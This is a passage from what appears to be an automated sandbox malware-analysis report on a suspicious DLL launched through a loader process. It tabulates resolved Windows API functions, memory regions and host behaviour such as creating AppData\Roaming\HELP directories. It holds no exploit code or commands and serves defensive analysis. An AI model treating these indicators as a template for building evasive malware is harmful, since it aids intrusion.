| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 93819 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #5: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa7c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A80
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00527fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00630fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72dd0000 | 0x72e14fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 93772 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #6: gorctexxzx.exe
125
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa90 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A94
0x
AA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x002f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x005e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x008bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x0088ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x008bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x009bffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
13 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
